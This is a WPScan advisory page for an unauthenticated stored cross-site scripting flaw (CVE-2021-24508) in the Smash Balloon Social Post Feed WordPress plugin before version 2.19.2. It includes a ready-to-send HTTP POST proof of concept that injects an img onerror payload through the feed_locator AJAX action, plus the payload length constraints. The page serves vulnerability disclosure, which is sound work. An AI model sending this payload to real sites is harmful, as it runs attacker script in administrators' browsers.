WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Smash Balloon Social Post Feed < 2.19.2 - Unauthenticated Stored XSS

Description

The plugin does not sanitise or escape the feedID POST parameter in its feed_locator AJAX action (available to both authenticated and unauthenticated users) before outputting a truncated version of it in the admin dashboard, leading to an unauthenticated Stored Cross-Site Scripting issue which will be executed in the context of a logged in administrator.

Proof of Concept

For the attack to be successful, the following requirements need to be meet
- Max payload size: 31 characters
- feedID parameter length must be greater than 31 characters to trigger the echo of unescaped data
- The shortCodeAtts parameter value must be uniq

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 192
Connection: close

action=feed_locator&feedLocatorData[0][feedID]=<img%20src%20onerror=alert(/XSS/)>
&feedLocatorData[0][shortCodeAtts]=uniq1234&feedLocatorData[0][postID]=1&feedLocatorData[0][location]=footer 


XSS will be triggered at https://example.com/wp-admin/admin.php?page=cff-top&tab=allfeeds 

Affects Plugins

custom-facebook-feed
Fixed in version 2.19.2

References

CVE
CVE-2021-24508

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

dc11

Submitter

dc11

Verified

Yes

WPVDB ID
2b543740-d4b0-49b5-a021-454a3a72162f

Timeline

Publicly Published

2021-08-16 (about 10 months ago)

Added

2021-08-16 (about 10 months ago)

Last Updated

2022-04-08 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceDisclosure policy
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us